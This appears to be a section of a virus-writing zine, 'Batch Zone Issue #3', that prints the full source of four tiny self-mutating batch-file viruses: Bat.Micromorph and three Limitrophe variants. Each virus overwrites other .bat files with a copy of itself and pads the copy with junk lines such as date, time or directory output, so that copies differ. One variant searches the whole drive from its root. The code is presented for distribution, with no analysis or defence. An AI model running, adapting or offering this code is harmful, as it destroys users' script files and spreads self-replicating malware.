*************************************************************************************************
***************************************Batch Zone Issue #3***************************************
*************************************************************************************************

 Small muta-infectors
 ~~~~~~~~~~~~~~~~~~~~
  The smallest infector-mutamorphic (with trash or fake bytes) batch virii:
  The rest ? No comment ...

--------[Bat.Micromorph]-------- [124 bytes] [SAD1c]
@type %0|find "@">%0
@ver|date|find /v "(">>%0
@ver|time|find ".">>%0
@rem|for %%m in (*.bat) do copy %0 %%m
@cls
@exit
--------[Bat.Micromorph]-------- [124 bytes] [SAD1c]

--------[Bat.Limitrophe.a]-------- [88 bytes] [DvL]
cTTy nUL
tYPe %0>1
EChO.>>1
vER|tIMe>>1
EchO.cLs>>1
FOr %%! In (*.b*) Do cOPy 1 %%!
--------[Bat.Limitrophe.a]-------- [88 bytes] [DvL]

--------[Bat.Limitrophe.b]-------- [83 bytes] [DvL]
CtTY nUL
TypE %0>2
eChO.>>2
DIr>>2
ecHO.ClS>>2
FOr %%_ iN (*.b*) dO cOPy 2 %%_
--------[Bat.Limitrophe.b]-------- [83 bytes] [DvL]

--------[Bat.Limitrophe.c]-------- [57 bytes] [DvL]
echo off
%random%
for /r \ %%j in (*.b*) do copy %0 %%j
--------[Bat.Limitrophe.c]-------- [57 bytes] [DvL]

*************************************************************************************************
***************************************Batch Zone Issue #3***************************************
*************************************************************************************************